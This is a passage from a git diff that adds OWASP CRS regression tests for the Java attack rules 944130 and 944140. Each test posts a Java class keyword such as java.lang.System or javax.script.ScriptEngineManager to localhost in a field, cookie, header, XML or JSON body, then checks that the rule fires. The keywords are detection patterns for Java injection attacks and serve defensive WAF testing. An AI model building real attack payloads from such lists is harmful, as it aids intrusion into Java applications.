\"944130\"" + - test_title: 944130-372 + desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-373 + desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-374 + desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-375 + desc: "Argument test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-376 + desc: "Argument name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-377 + desc: "Cookie test includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-378 + desc: "Cookie name includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-379 + desc: "Request header test includes 
keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-380 + desc: "XML attribute value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-381 + desc: "XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_title: 944130-382 + desc: "Nested XML element value includes keyword java.lang.System" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "java.lang.System"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-383
+ desc: "Content-Type text/plain includes keyword java.lang.System"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=java.lang.System"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-384
+ desc: "Content-Type application/json arg value includes keyword java.lang.System"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"java.lang.System\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-385
+ desc: "Content-Type application/json arg name includes keyword java.lang.System"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"java.lang.System\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-386
+ desc: "Argument test includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=javax.script.ScriptEngineManager"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-387
+ desc: "Argument name includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "javax.script.ScriptEngineManager=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-388
+ desc: "Cookie test includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=javax.script.ScriptEngineManager
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-389
+ desc: "Cookie name includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: javax.script.ScriptEngineManager=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-390
+ desc: "Request header test includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: javax.script.ScriptEngineManager
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-391
+ desc: "XML attribute value includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-392
+ desc: "XML element value includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "javax.script.ScriptEngineManager"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-393
+ desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "javax.script.ScriptEngineManager"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-394
+ desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=javax.script.ScriptEngineManager"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-395
+ desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"javax.script.ScriptEngineManager\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-396
+ desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"javax.script.ScriptEngineManager\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-397
+ desc: "Argument test includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=org.apache.commons"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-398
+ desc: "Argument name includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.apache.commons=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-399
+ desc: "Cookie test includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=org.apache.commons
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-400
+ desc: "Cookie name includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: org.apache.commons=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-401
+ desc: "Request header test includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: org.apache.commons
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-402
+ desc: "XML attribute value includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-403
+ desc: "XML element value includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.apache.commons"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-404
+ desc: "Nested XML element value includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.apache.commons"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-405
+ desc: "Content-Type text/plain includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=org.apache.commons"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-406
+ desc: "Content-Type application/json arg value includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"org.apache.commons\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-407
+ desc: "Content-Type application/json arg name includes keyword org.apache.commons"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"org.apache.commons\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-408
+ desc: "Argument test includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=org.omg.CORBA"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-409
+ desc: "Argument name includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.omg.CORBA=test"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-410
+ desc: "Cookie test includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: test=org.omg.CORBA
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-411
+ desc: "Cookie name includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ Cookie: org.omg.CORBA=test
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-412
+ desc: "Request header test includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/x-www-form-urlencoded"
+ test: org.omg.CORBA
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-413
+ desc: "XML attribute value includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-414
+ desc: "XML element value includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.omg.CORBA"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-415
+ desc: "Nested XML element value includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "org.omg.CORBA"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-416
+ desc: "Content-Type text/plain includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "test=org.omg.CORBA"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-417
+ desc: "Content-Type application/json arg value includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"org.omg.CORBA\"}"
+ output:
+ log_contains: "id \"944130\""
+ - test_title: 944130-418
+ desc: "Content-Type application/json arg name includes keyword org.omg.CORBA"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ version: "HTTP/1.0"
+ data: "{\"org.omg.CORBA\": \"test\"}"
+ output:
+ log_contains: "id \"944130\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
new file mode 100644
index 00000000..94fa1197
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml
@@ -0,0 +1,141 @@
+---
+meta:
+ author: lifeforms
+ description: None
+ enabled: true
+ name: 944140.yaml
+tests:
+ - test_title: 944140-1
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ port: 80
+ uri: /
+ output:
+ no_log_contains: id "944140"
+ - test_title: 944140-2
+ desc: Java script uploads
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
